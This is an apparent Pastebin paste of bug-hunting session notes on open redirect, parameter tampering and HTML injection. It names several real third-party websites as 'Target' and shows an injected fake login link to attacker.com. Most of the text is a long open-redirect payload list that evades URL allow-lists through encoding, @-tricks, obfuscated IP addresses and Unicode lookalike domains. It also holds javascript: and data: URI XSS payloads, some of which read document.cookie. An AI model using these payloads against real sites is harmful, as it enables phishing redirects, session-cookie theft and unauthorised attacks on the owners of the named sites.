suryah4ck3r

Session : URL Redirection , Parameter Tampering, Html Inject

Jan 25th, 2019
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.93 KB | None | 0 0
  1. URL Redirection / Open Redirect
  2.  
  3.  
  4. Vuln Description
  5. ● URL Redirection is used as part of phishing attack .
  6.  
  7.  
  8. https://gla.ac.in/agydsgdbgfnh
  9.  
  10. .php?url=/index.php
  11. .php?url=http://www.google.com
  12.  
  13. .js
  14.  
  15. ------------------------------------
  16. URL Redirection through GET Parameters
  17. ------------------------------------
  18. How to Hunt URL Redirection
  19. ● Find any url parameter having some kind of tendency to redirect anywhere
  20.  
  21. Common Parameter List
  22. ++++++++++++++++++++++
  23. dest redirect uri path continue url
  24. window to out view dir show navigation Open file
  25. val validate domain callback return page feed host port next data reference site url html
  26.  
  27. -----------------------------------
  28. Path Redirection
  29. -----------------------------------
  30. How to Hunt URL Redirection
  31. ● URL Redirection on Path Fragments
  32. example – any.com/payloads --> any.com/bing.com --> any.com//bing.com
  33.  
  34. Spider m y dekho --> 3XX
  35.  
  36. HTTP Redirection Status Code - 3xx
  37.  
  38. 300 Multiple Choices
  39. 301 Moved Permanently
  40. 302 Found
  41. 303 See Other
  42. 304 Not Modified
  43. 305 Use Proxy
  44. 307 Temporary Redirect
  45. 308 Permanent Redirect
  46.  
  47. Intruder --> Options --> Allow Redirection
  48.  
  49. Reference:
  50. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect
  51.  
  52.  
  53.  
  54. _____________________________________________________________________________________
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62. Background Concept about Parameter Tampering
  63.  
  64. The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control.
  65.  
  66. Example 1
  67. The parameter modification of form fields can be considered a typical example of Web Parameter Tampering attack.
  68. ● For example, consider a user who can select form field values (combo box, check box, etc.) on an application page. When these values are submitted by the user, they could be acquired and arbitrarily manipulated by an attacker.
  69.  
  70. Example 2
  71. <input type=”hidden” id=”1008” name=”cost” value=”70.00”>
  72. ● In this example, an attacker can modify the “value” information of a specific item, thus lowering its cost.
  73.  
  74. Example 3
  75. http://www.attackbank.com/default.asp?profile=741&debit=1000
  76. ● In this case, an attacker could tamper with the URL, using other values for profile and debit:
  77. http://www.attackbank.com/default.asp?profile=852&debit=2000
  78.  
  79.  
  80. --------------------------------------------------------------------------------------
  81.  
  82.  
  83.  
  84. Concept of HTML Injection
  85.  
  86. HTML Injection is a type of injection issue that occours when a user is able to control an input point and is able to inject arbitary HTML code into a vulnerable web page.
  87.  
  88. Impact of HTML Injection
  89. 1. Can allow attacker to modify page.
  90. 2. DOM Can be loaded.
  91. 3. Fake Logins/Phising page.
  92.  
  93.  
  94. How to do HTML Injection?
  95. -> Find an input (GET or POST)
  96. -> If input reflects back, there may be HTMLi
  97. -> Exploit if it succeds, You got HTMLi.
  98.  
  99.  
  100.  
  101. Target:
  102. testphp.vulnweb.com
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114.  
  115.  
  116.  
  117. ----------------------------------
  118. Exploitation:
  119. <a href="http://attacker.com">Login</a>
  120.  
  121.  
  122. Target:
  123. Manual:
  124. http://woodlandworldwide.com
  125.  
  126. Via Burp:
  127. projects.knmi.ml
  128.  
  129. ---------------------------------------------------------------------------------
  130.  
  131.  
  132. Payload:
  133.  
  134. Open Redirection Payload:
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148. //localdomain.pw/%2f..
  149. //www.whitelisteddomain.tld@localdomain.pw/%2f..
  150. ///localdomain.pw/%2f..
  151. ///www.whitelisteddomain.tld@localdomain.pw/%2f..
  152. ////localdomain.pw/%2f..
  153. ////www.whitelisteddomain.tld@localdomain.pw/%2f..
  154. https://localdomain.pw/%2f..
  155. https://www.whitelisteddomain.tld@localdomain.pw/%2f..
  156. /https://localdomain.pw/%2f..
  157. /https://www.whitelisteddomain.tld@localdomain.pw/%2f..
  158. //localdomain.pw/%2f%2e%2e
  159. //www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  160. ///localdomain.pw/%2f%2e%2e
  161. ///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  162. ////localdomain.pw/%2f%2e%2e
  163. ////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  164. https://localdomain.pw/%2f%2e%2e
  165. https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  166. /https://localdomain.pw/%2f%2e%2e
  167. /https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  168. //localdomain.pw/
  169. //www.whitelisteddomain.tld@localdomain.pw/
  170. ///localdomain.pw/
  171. ///www.whitelisteddomain.tld@localdomain.pw/
  172. ////localdomain.pw/
  173. ////www.whitelisteddomain.tld@localdomain.pw/
  174. https://localdomain.pw/
  175. https://www.whitelisteddomain.tld@localdomain.pw/
  176. /https://localdomain.pw/
  177. /https://www.whitelisteddomain.tld@localdomain.pw/
  178. //localdomain.pw//
  179. //www.whitelisteddomain.tld@localdomain.pw//
  180. ///localdomain.pw//
  181. ///www.whitelisteddomain.tld@localdomain.pw//
  182. ////localdomain.pw//
  183. ////www.whitelisteddomain.tld@localdomain.pw//
  184. https://localdomain.pw//
  185. https://www.whitelisteddomain.tld@localdomain.pw//
  186. //https://localdomain.pw//
  187. //https://www.whitelisteddomain.tld@localdomain.pw//
  188. //localdomain.pw/%2e%2e%2f
  189. //www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
  190. ///localdomain.pw/%2e%2e%2f
  191. ///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
  192. ////localdomain.pw/%2e%2e%2f
  193. ////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
  194. https://localdomain.pw/%2e%2e%2f
  195. https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
  196. //https://localdomain.pw/%2e%2e%2f
  197. //https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f
  198. ///localdomain.pw/%2e%2e
  199. ///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
  200. ////localdomain.pw/%2e%2e
  201. ////www.whitelisteddomain.tld@localdomain.pw/%2e%2e
  202. https:///localdomain.pw/%2e%2e
  203. https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e
  204. //https:///localdomain.pw/%2e%2e
  205. //www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e
  206. /https://localdomain.pw/%2e%2e
  207. /https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e
  208. ///localdomain.pw/%2f%2e%2e
  209. ///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  210. ////localdomain.pw/%2f%2e%2e
  211. ////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  212. https:///localdomain.pw/%2f%2e%2e
  213. https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  214. /https://localdomain.pw/%2f%2e%2e
  215. /https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  216. /https:///localdomain.pw/%2f%2e%2e
  217. /https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
  218. /%09/localdomain.pw
  219. /%09/www.whitelisteddomain.tld@localdomain.pw
  220. //%09/localdomain.pw
  221. //%09/www.whitelisteddomain.tld@localdomain.pw
  222. ///%09/localdomain.pw
  223. ///%09/www.whitelisteddomain.tld@localdomain.pw
  224. ////%09/localdomain.pw
  225. ////%09/www.whitelisteddomain.tld@localdomain.pw
  226. https://%09/localdomain.pw
  227. https://%09/www.whitelisteddomain.tld@localdomain.pw
  228. /%5clocaldomain.pw
  229. /%5cwww.whitelisteddomain.tld@localdomain.pw
  230. //%5clocaldomain.pw
  231. //%5cwww.whitelisteddomain.tld@localdomain.pw
  232. ///%5clocaldomain.pw
  233. ///%5cwww.whitelisteddomain.tld@localdomain.pw
  234. ////%5clocaldomain.pw
  235. ////%5cwww.whitelisteddomain.tld@localdomain.pw
  236. https://%5clocaldomain.pw
  237. https://%5cwww.whitelisteddomain.tld@localdomain.pw
  238. /https://%5clocaldomain.pw
  239. /https://%5cwww.whitelisteddomain.tld@localdomain.pw
  240. https://localdomain.pw
  241. https://www.whitelisteddomain.tld@localdomain.pw
  242. javascript:alert(1);
  243. javascript:alert(1)
  244. //javascript:alert(1);
  245. /javascript:alert(1);
  246. //javascript:alert(1)
  247. /javascript:alert(1)
  248. /%5cjavascript:alert(1);
  249. /%5cjavascript:alert(1)
  250. //%5cjavascript:alert(1);
  251. //%5cjavascript:alert(1)
  252. /%09/javascript:alert(1);
  253. /%09/javascript:alert(1)
  254. java%0d%0ascript%0d%0a:alert(0)
  255. //localdomain.pw
  256. http:localdomain.pw
  257. https:localdomain.pw
  258. //localdomain%E3%80%82pw
  259. \/\/localdomain.pw/
  260. /\/localdomain.pw/
  261. /%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
  262. //\/localdomain.pw/
  263. //localdomain%00.pw
  264. https://www.whitelisteddomain.tld/https://localdomain.pw/
  265. ";alert(0);//
  266. javascript://www.whitelisteddomain.tld?%a0alert%281%29
  267. http://0xd8.0x3a.0xd6.0xce
  268. http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
  269. http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
  270. http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
  271. http://0xd83ad6ce
  272. http://www.whitelisteddomain.tld@0xd83ad6ce
  273. http://3H6k7lIAiqjfNeN@0xd83ad6ce
  274. http://XY>.7d8T\205pZM@0xd83ad6ce
  275. http://3627734734
  276. http://www.whitelisteddomain.tld@3627734734
  277. http://3H6k7lIAiqjfNeN@3627734734
  278. http://XY>.7d8T\205pZM@3627734734
  279. http://472.314.470.462
  280. http://www.whitelisteddomain.tld@472.314.470.462
  281. http://3H6k7lIAiqjfNeN@472.314.470.462
  282. http://XY>.7d8T\205pZM@472.314.470.462
  283. http://0330.072.0326.0316
  284. http://www.whitelisteddomain.tld@0330.072.0326.0316
  285. http://3H6k7lIAiqjfNeN@0330.072.0326.0316
  286. http://XY>.7d8T\205pZM@0330.072.0326.0316
  287. http://00330.00072.0000326.00000316
  288. http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
  289. http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
  290. http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
  291. http://[::216.58.214.206]
  292. http://www.whitelisteddomain.tld@[::216.58.214.206]
  293. http://3H6k7lIAiqjfNeN@[::216.58.214.206]
  294. http://XY>.7d8T\205pZM@[::216.58.214.206]
  295. http://[::ffff:216.58.214.206]
  296. http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
  297. http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
  298. http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
  299. http://0xd8.072.54990
  300. http://www.whitelisteddomain.tld@0xd8.072.54990
  301. http://3H6k7lIAiqjfNeN@0xd8.072.54990
  302. http://XY>.7d8T\205pZM@0xd8.072.54990
  303. http://0xd8.3856078
  304. http://www.whitelisteddomain.tld@0xd8.3856078
  305. http://3H6k7lIAiqjfNeN@0xd8.3856078
  306. http://XY>.7d8T\205pZM@0xd8.3856078
  307. http://00330.3856078
  308. http://www.whitelisteddomain.tld@00330.3856078
  309. http://3H6k7lIAiqjfNeN@00330.3856078
  310. http://XY>.7d8T\205pZM@00330.3856078
  311. http://00330.0x3a.54990
  312. http://www.whitelisteddomain.tld@00330.0x3a.54990
  313. http://3H6k7lIAiqjfNeN@00330.0x3a.54990
  314. http://XY>.7d8T\205pZM@00330.0x3a.54990
  315. http:0xd8.0x3a.0xd6.0xce
  316. http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
  317. http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
  318. http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
  319. http:0xd83ad6ce
  320. http:www.whitelisteddomain.tld@0xd83ad6ce
  321. http:3H6k7lIAiqjfNeN@0xd83ad6ce
  322. http:XY>.7d8T\205pZM@0xd83ad6ce
  323. http:3627734734
  324. http:www.whitelisteddomain.tld@3627734734
  325. http:3H6k7lIAiqjfNeN@3627734734
  326. http:XY>.7d8T\205pZM@3627734734
  327. http:472.314.470.462
  328. http:www.whitelisteddomain.tld@472.314.470.462
  329. http:3H6k7lIAiqjfNeN@472.314.470.462
  330. http:XY>.7d8T\205pZM@472.314.470.462
  331. http:0330.072.0326.0316
  332. http:www.whitelisteddomain.tld@0330.072.0326.0316
  333. http:3H6k7lIAiqjfNeN@0330.072.0326.0316
  334. http:XY>.7d8T\205pZM@0330.072.0326.0316
  335. http:00330.00072.0000326.00000316
  336. http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
  337. http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
  338. http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
  339. http:[::216.58.214.206]
  340. http:www.whitelisteddomain.tld@[::216.58.214.206]
  341. http:3H6k7lIAiqjfNeN@[::216.58.214.206]
  342. http:XY>.7d8T\205pZM@[::216.58.214.206]
  343. http:[::ffff:216.58.214.206]
  344. http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
  345. http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
  346. http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
  347. http:0xd8.072.54990
  348. http:www.whitelisteddomain.tld@0xd8.072.54990
  349. http:3H6k7lIAiqjfNeN@0xd8.072.54990
  350. http:XY>.7d8T\205pZM@0xd8.072.54990
  351. http:0xd8.3856078
  352. http:www.whitelisteddomain.tld@0xd8.3856078
  353. http:3H6k7lIAiqjfNeN@0xd8.3856078
  354. http:XY>.7d8T\205pZM@0xd8.3856078
  355. http:00330.3856078
  356. http:www.whitelisteddomain.tld@00330.3856078
  357. http:3H6k7lIAiqjfNeN@00330.3856078
  358. http:XY>.7d8T\205pZM@00330.3856078
  359. http:00330.0x3a.54990
  360. http:www.whitelisteddomain.tld@00330.0x3a.54990
  361. http:3H6k7lIAiqjfNeN@00330.0x3a.54990
  362. http:XY>.7d8T\205pZM@00330.0x3a.54990
  363. 〱localdomain.pw
  364. 〵localdomain.pw
  365. ゝlocaldomain.pw
  366. ーlocaldomain.pw
  367. ーlocaldomain.pw
  368. /〱localdomain.pw
  369. /〵localdomain.pw
  370. /ゝlocaldomain.pw
  371. /ーlocaldomain.pw
  372. /ーlocaldomain.pw
  373. %68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
  374. https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
  375. <>javascript:alert(1);
  376. <>//localdomain.pw
  377. //localdomain.pw\@www.whitelisteddomain.tld
  378. https://:@localdomain.pw\@www.whitelisteddomain.tld
  379. \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
  380. \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
  381. ja\nva\tscript\r:alert(1)
  382. \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
  383. \152\141\166\141\163\143\162\151\160\164\072alert(1)
  384. http://localdomain.pw:80#@www.whitelisteddomain.tld/
  385. http://localdomain.pw:80?@www.whitelisteddomain.tld/
  386. http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
  387. http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
  388. http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
  389. http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
  390. http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
  391. http://localdomain.pw\twww.whitelisteddomain.tld/
  392. //localdomain.pw:80#@www.whitelisteddomain.tld/
  393. //localdomain.pw:80?@www.whitelisteddomain.tld/
  394. //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@localdomain.pw/
  395. //XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
  396. //3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@localdomain.pw/
  397. //XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
  398. //www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
  399. //localdomain.pw\twww.whitelisteddomain.tld/
  400. //;@localdomain.pw
  401. http://;@localdomain.pw
  402. @localdomain.pw
  403. javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
  404. data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
  405. http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
  406. http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
  407. http://localdomain.pw%3F.www.whitelisteddomain.tld/
  408. http://localdomain.pw%23.www.whitelisteddomain.tld/
  409. http://www.whitelisteddomain.tld:80%40localdomain.pw/
  410. http://www.whitelisteddomain.tld%2elocaldomain.pw/
  411. /x:1/:///%01javascript:alert(document.cookie)/
  412. /https:/%5clocaldomain.pw/
  413. https:/%5clocaldomain.pw/
  414. javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
  415. /http://localdomain.pw
  416. /%2f%2flocaldomain.pw
  417. //%2f%2flocaldomain.pw
  418. /localdomain.pw/%2f%2e%2e
  419. /http:/localdomain.pw
  420. http:/localdomain.pw
  421. /.localdomain.pw
  422. http://.localdomain.pw
  423. .localdomain.pw
  424. ///\;@localdomain.pw
  425. ///localdomain.pw
  426. /////localdomain.pw/
  427. /////localdomain.pw
  428. java%0ascript:alert(1)
  429. java%09script:alert(1)
  430. java%0dscript:alert(1)
  431. javascript://%0aalert(1)
  432. Javas%26%2399;ript:alert(1)
  433. data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
  434. jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
  435. http://www.localdomain.pw\.www.whitelisteddomain.tld
  436. %19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
  437. %01https://localdomain.pw
  438. www.whitelisteddomain.tld;@localdomain.pw
  439. https://www.whitelisteddomain.tld;@localdomain.pw
  440. http:%0a%0dlocaldomain.pw
  441. https://%0a%0dlocaldomain.pw
  442. localdomain.pw/www.whitelisteddomain.tld
  443. https://localdomain.pw/www.whitelisteddomain.tld
  444. //localdomain.pw/www.whitelisteddomain.tld
  445. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  446. //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  447. ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  448. ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  449. ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  450. ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  451. https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  452. https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  453. /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  454. /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
  455. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  456. //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  457. ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  458. ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  459. ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  460. ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  461. https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  462. https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  463. /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  464. /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  465. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  466. //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  467. ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  468. ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  469. ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  470. ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  471. https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  472. https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  473. /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  474. /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
  475. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  476. //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  477. ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  478. ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  479. ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  480. ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  481. https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  482. https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  483. //https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  484. //https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
  485. //Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  486. //www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  487. ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  488. ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  489. ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  490. ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  491. https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  492. https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  493. //https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  494. //https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
  495. ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  496. ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  497. ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  498. ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  499. https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  500. https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  501. //https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  502. //www.whitelisteddomain.tld@https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  503. /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  504. /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
  505. ///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  506. ///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  507. ////Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  508. ////www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  509. https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  510. https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  511. /https://Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  512. /https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  513. /https:///Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  514. /https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
  515. /%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  516. /%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  517. //%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  518. //%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  519. ///%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  520. ///%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  521. ////%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  522. ////%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
  523. https://%09/Ⓛ𝐨𝗰𝐀𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
